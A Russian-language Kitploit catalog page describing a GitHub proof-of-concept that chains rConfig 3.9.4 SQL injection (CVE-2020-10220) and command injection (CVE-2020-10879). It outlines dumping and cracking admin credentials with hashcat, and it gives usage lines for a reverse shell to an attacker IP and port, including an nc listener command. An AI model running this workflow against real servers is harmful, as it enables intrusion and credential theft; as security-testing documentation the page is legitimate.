Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
rConfig_rce — Объединённые PoC для rConfig: SQL-инъекция (CVE-2020-10220) и Командная инъекция (CVE-2020-10879) | Kitploit
Инструменты/GitHubGitHub/cspanias/rconfig_rce
Взлом паролейАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеКомандование и УправлениеОбучение и Образование
GitHubcspanias/rconfig_rce

rConfig_rce

Объединённые PoC для rConfig: SQL-инъекция (CVE-2020-10220) и Командная инъекция (CVE-2020-10879)

Репозиторий
1 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

rConfig 3.9 Комбинированная SQL-инъекция и инъекция команд PoC

Обзор

Этот PoC нацелен на rConfig версии 3.9.4 и демонстрирует эксплуатацию с помощью комбинации уязвимостей SQL-инъекции и удаленной инъекции команд. Он автоматизирует процесс:

  1. Извлечение имени базы данных через SQLi
  2. Дамп учетных данных пользователей из базы данных
  3. Попытка взлома хэшей паролей с помощью hashcat с использованием словаря rockyou и правил best64.rules
  4. Опционально выполнение удаленного выполнения команд (RCE) через инъекцию команд в функции поиска, используя взломанные учетные данные администратора

Этот скрипт основан и объединяет два оригинальных PoC:

  • 48208.py (SQL-инъекция) от vikingfr
  • 48241.py (Инъекция команд) от Matthew Aberegg и Michael Burkey

Был модифицирован для автоматизации взлома и опционального запуска оболочки.

Требования

  • Python 3
  • библиотека requests (pip install requests)
  • установленный hashcat, доступный через командную строку
  • словарь rockyou.txt (или эквивалентный), расположенный по пути /usr/share/wordlists/rockyou.txt
  • файл правил hashcat /usr/share/hashcat/rules/best64.rule

Использование

Только дамп пользователей и хэшей:

root@kitploit:~
python3 rConfig_rce.py https://target

Для дампа пользователей, взлома паролей и попытки RCE (требуется IP-адрес и порт атакующего для обратной оболочки):

root@kitploit:~
python3 rConfig_rce.py https://target attacker_ip attacker_port

Примечания

  • Если hashcat не может взломать пароль, скрипт предлагает использовать онлайн-сервисы взлома, такие как CrackStation.
  • Если хэш пароля не удается взломать автоматически, вам будет предложено ввести пароль в открытом виде вручную для попыток RCE.
  • Скрипт отдает приоритет использованию учетной записи admin для фазы инъекции команд.
  • Убедитесь, что у вас запущен слушатель (например, nc -lvnp 80) на вашей машине атакующего для получения обратной оболочки.

Отказ от ответственности

Этот инструмент предназначен только для авторизованного тестирования безопасности и образовательных целей. Несанкционированное использование против систем без разрешения незаконно и неэтично.

Скачать инструмент